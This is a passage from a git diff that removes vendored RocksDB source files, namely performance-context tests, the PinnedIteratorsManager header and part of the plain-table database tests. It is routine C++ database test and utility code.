-    std::cout << "Put uesr key comparison: \n" << hist_put.ToString()
-              << "Get uesr key comparison: \n" << hist_get.ToString()
-              << "MultiGet uesr key comparison: \n" << hist_get.ToString();
-    std::cout << "Put(): Pre and Post Process Time: \n"
-              << hist_write_pre_post.ToString() << " Writing WAL time: \n"
-              << hist_write_wal_time.ToString() << "\n"
-              << " Writing Mem Table time: \n"
-              << hist_write_memtable_time.ToString() << "\n"
-              << " Total DB mutex nanos: \n" << total_db_mutex_nanos << "\n";
-
-    std::cout << "Get(): Time to get snapshot: \n"
-              << hist_get_snapshot.ToString()
-              << " Time to get value from memtables: \n"
-              << hist_get_memtable.ToString() << "\n"
-              << " Time to get value from output files: \n"
-              << hist_get_files.ToString() << "\n"
-              << " Number of memtables checked: \n"
-              << hist_num_memtable_checked.ToString() << "\n"
-              << " Time to post process: \n" << hist_get_post_process.ToString()
-              << "\n";
-
-    std::cout << "MultiGet(): Time to get snapshot: \n"
-              << hist_mget_snapshot.ToString()
-              << " Time to get value from memtables: \n"
-              << hist_mget_memtable.ToString() << "\n"
-              << " Time to get value from output files: \n"
-              << hist_mget_files.ToString() << "\n"
-              << " Number of memtables checked: \n"
-              << hist_mget_num_memtable_checked.ToString() << "\n"
-              << " Time to post process: \n"
-              << hist_mget_post_process.ToString() << "\n";
-  }
-
-  if (enabled_time) {
-    ASSERT_GT(hist_get.Average(), 0);
-    ASSERT_GT(hist_get_snapshot.Average(), 0);
-    ASSERT_GT(hist_get_memtable.Average(), 0);
-    ASSERT_GT(hist_get_files.Average(), 0);
-    ASSERT_GT(hist_get_post_process.Average(), 0);
-    ASSERT_GT(hist_num_memtable_checked.Average(), 0);
-
-    ASSERT_GT(hist_mget.Average(), 0);
-    ASSERT_GT(hist_mget_snapshot.Average(), 0);
-    ASSERT_GT(hist_mget_memtable.Average(), 0);
-    ASSERT_GT(hist_mget_files.Average(), 0);
-    ASSERT_GT(hist_mget_post_process.Average(), 0);
-    ASSERT_GT(hist_mget_num_memtable_checked.Average(), 0);
-#ifndef NDEBUG
-    ASSERT_GT(total_db_mutex_nanos, 2000U);
-#endif
-  }
-
-  db.reset();
-  db = OpenDb(true);
-
-  hist_get.Clear();
-  hist_get_snapshot.Clear();
-  hist_get_memtable.Clear();
-  hist_get_files.Clear();
-  hist_get_post_process.Clear();
-  hist_num_memtable_checked.Clear();
-
-  hist_mget.Clear();
-  hist_mget_snapshot.Clear();
-  hist_mget_memtable.Clear();
-  hist_mget_files.Clear();
-  hist_mget_post_process.Clear();
-  hist_mget_num_memtable_checked.Clear();
-
-  for (const int i : keys) {
-    if (i == kFlushFlag) {
-      continue;
-    }
-    std::string key = "k" + ToString(i);
-    std::string expected_value = "v" + ToString(i);
-    std::string value;
-
-    std::vector<Slice> multiget_keys = {Slice(key)};
-    std::vector<std::string> values;
-
-    get_perf_context()->Reset();
-    ASSERT_OK(db->Get(read_options, key, &value));
-    ASSERT_EQ(expected_value, value);
-    hist_get_snapshot.Add(get_perf_context()->get_snapshot_time);
-    hist_get_memtable.Add(get_perf_context()->get_from_memtable_time);
-    hist_get_files.Add(get_perf_context()->get_from_output_files_time);
-    hist_num_memtable_checked.Add(get_perf_context()->get_from_memtable_count);
-    hist_get_post_process.Add(get_perf_context()->get_post_process_time);
-    hist_get.Add(get_perf_context()->user_key_comparison_count);
-
-    get_perf_context()->Reset();
-    db->MultiGet(read_options, multiget_keys, &values);
-    hist_mget_snapshot.Add(get_perf_context()->get_snapshot_time);
-    hist_mget_memtable.Add(get_perf_context()->get_from_memtable_time);
-    hist_mget_files.Add(get_perf_context()->get_from_output_files_time);
-    hist_mget_num_memtable_checked.Add(get_perf_context()->get_from_memtable_count);
-    hist_mget_post_process.Add(get_perf_context()->get_post_process_time);
-    hist_mget.Add(get_perf_context()->user_key_comparison_count);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "ReadOnly Get uesr key comparison: \n" << hist_get.ToString()
-              << "ReadOnly MultiGet uesr key comparison: \n"
-              << hist_mget.ToString();
-
-    std::cout << "ReadOnly Get(): Time to get snapshot: \n"
-              << hist_get_snapshot.ToString()
-              << " Time to get value from memtables: \n"
-              << hist_get_memtable.ToString() << "\n"
-              << " Time to get value from output files: \n"
-              << hist_get_files.ToString() << "\n"
-              << " Number of memtables checked: \n"
-              << hist_num_memtable_checked.ToString() << "\n"
-              << " Time to post process: \n" << hist_get_post_process.ToString()
-              << "\n";
-
-    std::cout << "ReadOnly MultiGet(): Time to get snapshot: \n"
-              << hist_mget_snapshot.ToString()
-              << " Time to get value from memtables: \n"
-              << hist_mget_memtable.ToString() << "\n"
-              << " Time to get value from output files: \n"
-              << hist_mget_files.ToString() << "\n"
-              << " Number of memtables checked: \n"
-              << hist_mget_num_memtable_checked.ToString() << "\n"
-              << " Time to post process: \n"
-              << hist_mget_post_process.ToString() << "\n";
-  }
-
-  if (enabled_time) {
-    ASSERT_GT(hist_get.Average(), 0);
-    ASSERT_GT(hist_get_memtable.Average(), 0);
-    ASSERT_GT(hist_get_files.Average(), 0);
-    ASSERT_GT(hist_num_memtable_checked.Average(), 0);
-    // In read-only mode Get(), no super version operation is needed
-    ASSERT_EQ(hist_get_post_process.Average(), 0);
-    ASSERT_EQ(hist_get_snapshot.Average(), 0);
-
-    ASSERT_GT(hist_mget.Average(), 0);
-    ASSERT_GT(hist_mget_snapshot.Average(), 0);
-    ASSERT_GT(hist_mget_memtable.Average(), 0);
-    ASSERT_GT(hist_mget_files.Average(), 0);
-    ASSERT_GT(hist_mget_post_process.Average(), 0);
-    ASSERT_GT(hist_mget_num_memtable_checked.Average(), 0);
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(PerfContextTest, KeyComparisonCount) {
-  SetPerfLevel(kEnableCount);
-  ProfileQueries();
-
-  SetPerfLevel(kDisable);
-  ProfileQueries();
-
-  SetPerfLevel(kEnableTime);
-  ProfileQueries(true);
-}
-#endif  // ROCKSDB_LITE
-
-// make perf_context_test
-// export ROCKSDB_TESTS=PerfContextTest.SeekKeyComparison
-// For one memtable:
-// ./perf_context_test --write_buffer_size=500000 --total_keys=10000
-// For two memtables:
-// ./perf_context_test --write_buffer_size=250000 --total_keys=10000
-// Specify --random_key=1 to shuffle the key before insertion
-// Results show that, for sequential insertion, worst-case Seek Key comparison
-// is close to the total number of keys (linear), when there is only one
-// memtable. When there are two memtables, even the avg Seek Key comparison
-// starts to become linear to the input size.
-
-TEST_F(PerfContextTest, SeekKeyComparison) {
-  DestroyDB(kDbName, Options());
-  auto db = OpenDb();
-  WriteOptions write_options;
-  ReadOptions read_options;
-
-  if (FLAGS_verbose) {
-    std::cout << "Inserting " << FLAGS_total_keys << " key/value pairs\n...\n";
-  }
-
-  std::vector<int> keys;
-  for (int i = 0; i < FLAGS_total_keys; ++i) {
-    keys.push_back(i);
-  }
-
-  if (FLAGS_random_key) {
-    std::random_shuffle(keys.begin(), keys.end());
-  }
-
-  HistogramImpl hist_put_time;
-  HistogramImpl hist_wal_time;
-  HistogramImpl hist_time_diff;
-
-  SetPerfLevel(kEnableTime);
-  StopWatchNano timer(Env::Default());
-  for (const int i : keys) {
-    std::string key = "k" + ToString(i);
-    std::string value = "v" + ToString(i);
-
-    get_perf_context()->Reset();
-    timer.Start();
-    db->Put(write_options, key, value);
-    auto put_time = timer.ElapsedNanos();
-    hist_put_time.Add(put_time);
-    hist_wal_time.Add(get_perf_context()->write_wal_time);
-    hist_time_diff.Add(put_time - get_perf_context()->write_wal_time);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "Put time:\n" << hist_put_time.ToString() << "WAL time:\n"
-              << hist_wal_time.ToString() << "time diff:\n"
-              << hist_time_diff.ToString();
-  }
-
-  HistogramImpl hist_seek;
-  HistogramImpl hist_next;
-
-  for (int i = 0; i < FLAGS_total_keys; ++i) {
-    std::string key = "k" + ToString(i);
-    std::string value = "v" + ToString(i);
-
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-    get_perf_context()->Reset();
-    iter->Seek(key);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->value().ToString(), value);
-    hist_seek.Add(get_perf_context()->user_key_comparison_count);
-  }
-
-  std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-  for (iter->SeekToFirst(); iter->Valid();) {
-    get_perf_context()->Reset();
-    iter->Next();
-    hist_next.Add(get_perf_context()->user_key_comparison_count);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "Seek:\n" << hist_seek.ToString() << "Next:\n"
-              << hist_next.ToString();
-  }
-}
-
-TEST_F(PerfContextTest, DBMutexLockCounter) {
-  int stats_code[] = {0, static_cast<int>(DB_MUTEX_WAIT_MICROS)};
-  for (PerfLevel perf_level :
-       {PerfLevel::kEnableTimeExceptForMutex, PerfLevel::kEnableTime}) {
-    for (int c = 0; c < 2; ++c) {
-    InstrumentedMutex mutex(nullptr, Env::Default(), stats_code[c]);
-    mutex.Lock();
-    rocksdb::port::Thread child_thread([&] {
-      SetPerfLevel(perf_level);
-      get_perf_context()->Reset();
-      ASSERT_EQ(get_perf_context()->db_mutex_lock_nanos, 0);
-      mutex.Lock();
-      mutex.Unlock();
-      if (perf_level == PerfLevel::kEnableTimeExceptForMutex ||
-          stats_code[c] != DB_MUTEX_WAIT_MICROS) {
-        ASSERT_EQ(get_perf_context()->db_mutex_lock_nanos, 0);
-      } else {
-        // increment the counter only when it's a DB Mutex
-        ASSERT_GT(get_perf_context()->db_mutex_lock_nanos, 0);
-      }
-    });
-    Env::Default()->SleepForMicroseconds(100);
-    mutex.Unlock();
-    child_thread.join();
-  }
-  }
-}
-
-TEST_F(PerfContextTest, FalseDBMutexWait) {
-  SetPerfLevel(kEnableTime);
-  int stats_code[] = {0, static_cast<int>(DB_MUTEX_WAIT_MICROS)};
-  for (int c = 0; c < 2; ++c) {
-    InstrumentedMutex mutex(nullptr, Env::Default(), stats_code[c]);
-    InstrumentedCondVar lock(&mutex);
-    get_perf_context()->Reset();
-    mutex.Lock();
-    lock.TimedWait(100);
-    mutex.Unlock();
-    if (stats_code[c] == static_cast<int>(DB_MUTEX_WAIT_MICROS)) {
-      // increment the counter only when it's a DB Mutex
-      ASSERT_GT(get_perf_context()->db_condition_wait_nanos, 0);
-    } else {
-      ASSERT_EQ(get_perf_context()->db_condition_wait_nanos, 0);
-    }
-  }
-}
-
-TEST_F(PerfContextTest, ToString) {
-  get_perf_context()->Reset();
-  get_perf_context()->block_read_count = 12345;
-
-  std::string zero_included = get_perf_context()->ToString();
-  ASSERT_NE(std::string::npos, zero_included.find("= 0"));
-  ASSERT_NE(std::string::npos, zero_included.find("= 12345"));
-
-  std::string zero_excluded = get_perf_context()->ToString(true);
-  ASSERT_EQ(std::string::npos, zero_excluded.find("= 0"));
-  ASSERT_NE(std::string::npos, zero_excluded.find("= 12345"));
-}
-
-TEST_F(PerfContextTest, MergeOperatorTime) {
-  DestroyDB(kDbName, Options());
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator = MergeOperators::CreateStringAppendOperator();
-  Status s = DB::Open(options, kDbName, &db);
-  EXPECT_OK(s);
-
-  std::string val;
-  ASSERT_OK(db->Merge(WriteOptions(), "k1", "val1"));
-  ASSERT_OK(db->Merge(WriteOptions(), "k1", "val2"));
-  ASSERT_OK(db->Merge(WriteOptions(), "k1", "val3"));
-  ASSERT_OK(db->Merge(WriteOptions(), "k1", "val4"));
-
-  SetPerfLevel(kEnableTime);
-  get_perf_context()->Reset();
-  ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-#ifdef OS_SOLARIS
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-  }
-#endif
-  EXPECT_GT(get_perf_context()->merge_operator_time_nanos, 0);
-
-  ASSERT_OK(db->Flush(FlushOptions()));
-
-  get_perf_context()->Reset();
-  ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-#ifdef OS_SOLARIS
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-  }
-#endif
-  EXPECT_GT(get_perf_context()->merge_operator_time_nanos, 0);
-
-  ASSERT_OK(db->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  get_perf_context()->Reset();
-  ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-#ifdef OS_SOLARIS
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-  }
-#endif
-  EXPECT_GT(get_perf_context()->merge_operator_time_nanos, 0);
-
-  delete db;
-}
-}
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-
-  for (int i = 1; i < argc; i++) {
-    int n;
-    char junk;
-
-    if (sscanf(argv[i], "--write_buffer_size=%d%c", &n, &junk) == 1) {
-      FLAGS_write_buffer_size = n;
-    }
-
-    if (sscanf(argv[i], "--total_keys=%d%c", &n, &junk) == 1) {
-      FLAGS_total_keys = n;
-    }
-
-    if (sscanf(argv[i], "--random_key=%d%c", &n, &junk) == 1 &&
-        (n == 0 || n == 1)) {
-      FLAGS_random_key = n;
-    }
-
-    if (sscanf(argv[i], "--use_set_based_memetable=%d%c", &n, &junk) == 1 &&
-        (n == 0 || n == 1)) {
-      FLAGS_use_set_based_memetable = n;
-    }
-
-    if (sscanf(argv[i], "--verbose=%d%c", &n, &junk) == 1 &&
-        (n == 0 || n == 1)) {
-      FLAGS_verbose = n;
-    }
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << kDbName << "\n";
-  }
-
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/pinned_iterators_manager.h b/thirdparty/rocksdb/db/pinned_iterators_manager.h
deleted file mode 100644
index 7874eef..0000000
--- a/thirdparty/rocksdb/db/pinned_iterators_manager.h
+++ /dev/null
@@ -1,87 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include <algorithm>
-#include <memory>
-#include <utility>
-#include <vector>
-
-#include "table/internal_iterator.h"
-
-namespace rocksdb {
-
-// PinnedIteratorsManager will be notified whenever we need to pin an Iterator
-// and it will be responsible for deleting pinned Iterators when they are
-// not needed anymore.
-class PinnedIteratorsManager : public Cleanable {
- public:
-  PinnedIteratorsManager() : pinning_enabled(false) {}
-  ~PinnedIteratorsManager() {
-    if (pinning_enabled) {
-      ReleasePinnedData();
-    }
-  }
-
-  // Enable Iterators pinning
-  void StartPinning() {
-    assert(pinning_enabled == false);
-    pinning_enabled = true;
-  }
-
-  // Is pinning enabled ?
-  bool PinningEnabled() { return pinning_enabled; }
-
-  // Take ownership of iter and delete it when ReleasePinnedData() is called
-  void PinIterator(InternalIterator* iter, bool arena = false) {
-    if (arena) {
-      PinPtr(iter, &PinnedIteratorsManager::ReleaseArenaInternalIterator);
-    } else {
-      PinPtr(iter, &PinnedIteratorsManager::ReleaseInternalIterator);
-    }
-  }
-
-  typedef void (*ReleaseFunction)(void* arg1);
-  void PinPtr(void* ptr, ReleaseFunction release_func) {
-    assert(pinning_enabled);
-    if (ptr == nullptr) {
-      return;
-    }
-    pinned_ptrs_.emplace_back(ptr, release_func);
-  }
-
-  // Release pinned Iterators
-  inline void ReleasePinnedData() {
-    assert(pinning_enabled == true);
-    pinning_enabled = false;
-
-    // Remove duplicate pointers
-    std::sort(pinned_ptrs_.begin(), pinned_ptrs_.end());
-    auto unique_end = std::unique(pinned_ptrs_.begin(), pinned_ptrs_.end());
-
-    for (auto i = pinned_ptrs_.begin(); i != unique_end; ++i) {
-      void* ptr = i->first;
-      ReleaseFunction release_func = i->second;
-      release_func(ptr);
-    }
-    pinned_ptrs_.clear();
-    // Also do cleanups from the base Cleanable
-    Cleanable::Reset();
-  }
-
- private:
-  static void ReleaseInternalIterator(void* ptr) {
-    delete reinterpret_cast<InternalIterator*>(ptr);
-  }
-
-  static void ReleaseArenaInternalIterator(void* ptr) {
-    reinterpret_cast<InternalIterator*>(ptr)->~InternalIterator();
-  }
-
-  bool pinning_enabled;
-  std::vector<std::pair<void*, ReleaseFunction>> pinned_ptrs_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/plain_table_db_test.cc b/thirdparty/rocksdb/db/plain_table_db_test.cc
deleted file mode 100644
index 0b60332..0000000
--- a/thirdparty/rocksdb/db/plain_table_db_test.cc
+++ /dev/null
@@ -1,1178 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <set>
-
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "table/bloom_block.h"
-#include "table/meta_blocks.h"
-#include "table/plain_table_factory.h"
-#include "table/plain_table_key_coding.h"
-#include "table/plain_table_reader.h"
-#include "table/table_builder.h"
-#include "util/filename.h"
-#include "util/hash.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-using std::unique_ptr;
-
-namespace rocksdb {
-class PlainTableKeyDecoderTest : public testing::Test {};
-
-TEST_F(PlainTableKeyDecoderTest, ReadNonMmap) {
-  std::string tmp;
-  Random rnd(301);
-  const uint32_t kLength = 2222;
-  Slice contents = test::RandomString(&rnd, kLength, &tmp);
-  test::StringSource* string_source =
-      new test::StringSource(contents, 0, false);
-
-  unique_ptr<RandomAccessFileReader> file_reader(
-      test::GetRandomAccessFileReader(string_source));
-  unique_ptr<PlainTableReaderFileInfo> file_info(new PlainTableReaderFileInfo(
-      std::move(file_reader), EnvOptions(), kLength));
-
-  {
-    PlainTableFileReader reader(file_info.get());
-
-    const uint32_t kReadSize = 77;
-    for (uint32_t pos = 0; pos < kLength; pos += kReadSize) {
-      uint32_t read_size = std::min(kLength - pos, kReadSize);
-      Slice out;
-      ASSERT_TRUE(reader.Read(pos, read_size, &out));
-      ASSERT_EQ(0, out.compare(tmp.substr(pos, read_size)));
-    }
-
-    ASSERT_LT(uint32_t(string_source->total_reads()), kLength / kReadSize / 2);
-  }
-
-  std::vector<std::vector<std::pair<uint32_t, uint32_t>>> reads = {
-      {{600, 30}, {590, 30}, {600, 20}, {600, 40}},
-      {{800, 20}, {100, 20}, {500, 20}, {1500, 20}, {100, 20}, {80, 20}},
-      {{1000, 20}, {500, 20}, {1000, 50}},
-      {{1000, 20}, {500, 20}, {500, 20}},
-      {{1000, 20}, {500, 20}, {200, 20}, {500, 20}},
-      {{1000, 20}, {500, 20}, {200, 20}, {1000, 50}},
-      {{600, 500}, {610, 20}, {100, 20}},
-      {{500, 100}, {490, 100}, {550, 50}},
-  };
-
-  std::vector<int> num_file_reads = {2, 6, 2, 2, 4, 3, 2, 2};
-
-  for (size_t i = 0; i < reads.size(); i++) {
-    string_source->set_total_reads(0);
-    PlainTableFileReader reader(file_info.get());
-    for (auto p : reads[i]) {
-      Slice out;
-      ASSERT_TRUE(reader.Read(p.first, p.second, &out));
-      ASSERT_EQ(0, out.compare(tmp.substr(p.first, p.second)));
-    }
-    ASSERT_EQ(num_file_reads[i], string_source->total_reads());
-  }
-}
-
-class PlainTableDBTest : public testing::Test,
-                         public testing::WithParamInterface<bool> {
- protected:
- private:
-  std::string dbname_;
-  Env* env_;
-  DB* db_;
-
-  bool mmap_mode_;
-  Options last_options_;
-
- public:
-  PlainTableDBTest() : env_(Env::Default()) {}
-
-  ~PlainTableDBTest() {
-    delete db_;
-    EXPECT_OK(DestroyDB(dbname_, Options()));
-  }
-
-  void SetUp() override {
-    mmap_mode_ = GetParam();
-    dbname_ = test::TmpDir() + "/plain_table_db_test";
-    EXPECT_OK(DestroyDB(dbname_, Options()));
-    db_ = nullptr;
-    Reopen();
-  }
-
-  // Return the current option configuration.
-  Options CurrentOptions() {
-    Options options;
-
-    PlainTableOptions plain_table_options;
-    plain_table_options.user_key_len = 0;
-    plain_table_options.bloom_bits_per_key = 2;
-    plain_table_options.hash_table_ratio = 0.8;
-    plain_table_options.index_sparseness = 3;
-    plain_table_options.huge_page_tlb_size = 0;
-    plain_table_options.encoding_type = kPrefix;
-    plain_table_options.full_scan_mode = false;
-    plain_table_options.store_index_in_file = false;
-
-    options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-    options.memtable_factory.reset(NewHashLinkListRepFactory(4, 0, 3, true));
-
-    options.prefix_extractor.reset(NewFixedPrefixTransform(8));
-    options.allow_mmap_reads = mmap_mode_;
-    options.allow_concurrent_memtable_write = false;
-    return options;
-  }
-
-  DBImpl* dbfull() {
-    return reinterpret_cast<DBImpl*>(db_);
-  }
-
-  void Reopen(Options* options = nullptr) {
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Close() {
-    delete db_;
-    db_ = nullptr;
-  }
-
-  void DestroyAndReopen(Options* options = nullptr) {
-    //Destroy using last options
-    Destroy(&last_options_);
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Destroy(Options* options) {
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(DestroyDB(dbname_, *options));
-  }
-
-  Status PureReopen(Options* options, DB** db) {
-    return DB::Open(*options, dbname_, db);
-  }
-
-  Status TryReopen(Options* options = nullptr) {
-    delete db_;
-    db_ = nullptr;
-    Options opts;
-    if (options != nullptr) {
-      opts = *options;
-    } else {
-      opts = CurrentOptions();
-      opts.create_if_missing = true;
-    }
-    last_options_ = opts;
-
-    return DB::Open(opts, dbname_, &db_);
-  }
-
-  Status Put(const Slice& k, const Slice& v) {
-    return db_->Put(WriteOptions(), k, v);
-  }
-
-  Status Delete(const std::string& k) {
-    return db_->Delete(WriteOptions(), k);
-  }
-
-  std::string Get(const std::string& k, const Snapshot* snapshot = nullptr) {
-    ReadOptions options;
-    options.snapshot = snapshot;
-    std::string result;
-    Status s = db_->Get(options, k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-
-  int NumTableFilesAtLevel(int level) {
-    std::string property;
-    EXPECT_TRUE(db_->GetProperty(
-        "rocksdb.num-files-at-level" + NumberToString(level), &property));
-    return atoi(property.c_str());
-  }
-
-  // Return spread of files per level
-  std::string FilesPerLevel() {
-    std::string result;
-    size_t last_non_zero_offset = 0;
-    for (int level = 0; level < db_->NumberLevels(); level++) {
-      int f = NumTableFilesAtLevel(level);
-      char buf[100];
-      snprintf(buf, sizeof(buf), "%s%d", (level ? "," : ""), f);
-      result += buf;
-      if (f > 0) {
-        last_non_zero_offset = result.size();
-      }
-    }
-    result.resize(last_non_zero_offset);
-    return result;
-  }
-
-  std::string IterStatus(Iterator* iter) {
-    std::string result;
-    if (iter->Valid()) {
-      result = iter->key().ToString() + "->" + iter->value().ToString();
-    } else {
-      result = "(invalid)";
-    }
-    return result;
-  }
-};
-
-TEST_P(PlainTableDBTest, Empty) {
-  ASSERT_TRUE(dbfull() != nullptr);
-  ASSERT_EQ("NOT_FOUND", Get("0000000000000foo"));
-}
-
-extern const uint64_t kPlainTableMagicNumber;
-
-class TestPlainTableReader : public PlainTableReader {
- public:
-  TestPlainTableReader(const EnvOptions& env_options,
-                       const InternalKeyComparator& icomparator,
-                       EncodingType encoding_type, uint64_t file_size,
-                       int bloom_bits_per_key, double hash_table_ratio,
-                       size_t index_sparseness,
-                       const TableProperties* table_properties,
-                       unique_ptr<RandomAccessFileReader>&& file,
-                       const ImmutableCFOptions& ioptions,
-                       bool* expect_bloom_not_match, bool store_index_in_file,
-                       uint32_t column_family_id,
-                       const std::string& column_family_name)
-      : PlainTableReader(ioptions, std::move(file), env_options, icomparator,
-                         encoding_type, file_size, table_properties),
-        expect_bloom_not_match_(expect_bloom_not_match) {
-    Status s = MmapDataIfNeeded();
-    EXPECT_TRUE(s.ok());
-
-    s = PopulateIndex(const_cast<TableProperties*>(table_properties),
-                      bloom_bits_per_key, hash_table_ratio, index_sparseness,
-                      2 * 1024 * 1024);
-    EXPECT_TRUE(s.ok());
-
-    TableProperties* props = const_cast<TableProperties*>(table_properties);
-    EXPECT_EQ(column_family_id, static_cast<uint32_t>(props->column_family_id));
-    EXPECT_EQ(column_family_name, props->column_family_name);
-    if (store_index_in_file) {
-      auto bloom_version_ptr = props->user_collected_properties.find(
-          PlainTablePropertyNames::kBloomVersion);
-      EXPECT_TRUE(bloom_version_ptr != props->user_collected_properties.end());
-      EXPECT_EQ(bloom_version_ptr->second, std::string("1"));
-      if (ioptions.bloom_locality > 0) {
-        auto num_blocks_ptr = props->user_collected_properties.find(
-            PlainTablePropertyNames::kNumBloomBlocks);
-        EXPECT_TRUE(num_blocks_ptr != props->user_collected_properties.end());
-      }
-    }
-  }
-
-  virtual ~TestPlainTableReader() {}
-
- private:
-  virtual bool MatchBloom(uint32_t hash) const override {
-    bool ret = PlainTableReader::MatchBloom(hash);
-    if (*expect_bloom_not_match_) {
-      EXPECT_TRUE(!ret);
-    } else {
-      EXPECT_TRUE(ret);
-    }
-    return ret;
-  }
-  bool* expect_bloom_not_match_;
-};
-
-extern const uint64_t kPlainTableMagicNumber;
-class TestPlainTableFactory : public PlainTableFactory {
- public:
-  explicit TestPlainTableFactory(bool* expect_bloom_not_match,
-                                 const PlainTableOptions& options,
-                                 uint32_t column_family_id,
-                                 std::string column_family_name)
-      : PlainTableFactory(options),
-        bloom_bits_per_key_(options.bloom_bits_per_key),
-        hash_table_ratio_(options.hash_table_ratio),
-        index_sparseness_(options.index_sparseness),
-        store_index_in_file_(options.store_index_in_file),
-        expect_bloom_not_match_(expect_bloom_not_match),
-        column_family_id_(column_family_id),
-        column_family_name_(std::move(column_family_name)) {}
-
-  Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table,
-      bool prefetch_index_and_filter_in_cache) const override {
-    TableProperties* props = nullptr;
-    auto s =
-        ReadTableProperties(file.get(), file_size, kPlainTableMagicNumber,
-                            table_reader_options.ioptions, &props);
-    EXPECT_TRUE(s.ok());
-
-    if (store_index_in_file_) {
-      BlockHandle bloom_block_handle;
-      s = FindMetaBlock(file.get(), file_size, kPlainTableMagicNumber,
-                        table_reader_options.ioptions,
-                        BloomBlockBuilder::kBloomBlock, &bloom_block_handle);
-      EXPECT_TRUE(s.ok());
-
-      BlockHandle index_block_handle;
-      s = FindMetaBlock(file.get(), file_size, kPlainTableMagicNumber,
-                        table_reader_options.ioptions,
-                        PlainTableIndexBuilder::kPlainTableIndexBlock,
-                        &index_block_handle);
-      EXPECT_TRUE(s.ok());
-    }
-
-    auto& user_props = props->user_collected_properties;
-    auto encoding_type_prop =
-        user_props.find(PlainTablePropertyNames::kEncodingType);
-    assert(encoding_type_prop != user_props.end());
-    EncodingType encoding_type = static_cast<EncodingType>(
-        DecodeFixed32(encoding_type_prop->second.c_str()));
-
-    std::unique_ptr<PlainTableReader> new_reader(new TestPlainTableReader(
-        table_reader_options.env_options,
-        table_reader_options.internal_comparator, encoding_type, file_size,
-        bloom_bits_per_key_, hash_table_ratio_, index_sparseness_, props,
-        std::move(file), table_reader_options.ioptions, expect_bloom_not_match_,
-        store_index_in_file_, column_family_id_, column_family_name_));
-
-    *table = std::move(new_reader);
-    return s;
-  }
-
- private:
-  int bloom_bits_per_key_;
-  double hash_table_ratio_;
-  size_t index_sparseness_;
-  bool store_index_in_file_;
-  bool* expect_bloom_not_match_;
-  const uint32_t column_family_id_;
-  const std::string column_family_name_;
-};
-
-TEST_P(PlainTableDBTest, Flush) {
-  for (size_t huge_page_tlb_size = 0; huge_page_tlb_size <= 2 * 1024 * 1024;
-       huge_page_tlb_size += 2 * 1024 * 1024) {
-    for (EncodingType encoding_type : {kPlain, kPrefix}) {
-    for (int bloom_bits = 0; bloom_bits <= 117; bloom_bits += 117) {
-      for (int total_order = 0; total_order <= 1; total_order++) {
-        for (int store_index_in_file = 0; store_index_in_file <= 1;
-             ++store_index_in_file) {
-          Options options = CurrentOptions();
-          options.create_if_missing = true;
-          // Set only one bucket to force bucket conflict.
-          // Test index interval for the same prefix to be 1, 2 and 4
-          if (total_order) {
-            options.prefix_extractor.reset();
-
-            PlainTableOptions plain_table_options;
-            plain_table_options.user_key_len = 0;
-            plain_table_options.bloom_bits_per_key = bloom_bits;
-            plain_table_options.hash_table_ratio = 0;
-            plain_table_options.index_sparseness = 2;
-            plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-            plain_table_options.encoding_type = encoding_type;
-            plain_table_options.full_scan_mode = false;
-            plain_table_options.store_index_in_file = store_index_in_file;
-
-            options.table_factory.reset(
-                NewPlainTableFactory(plain_table_options));
-          } else {
-            PlainTableOptions plain_table_options;
-            plain_table_options.user_key_len = 0;
-            plain_table_options.bloom_bits_per_key = bloom_bits;
-            plain_table_options.hash_table_ratio = 0.75;
-            plain_table_options.index_sparseness = 16;
-            plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-            plain_table_options.encoding_type = encoding_type;
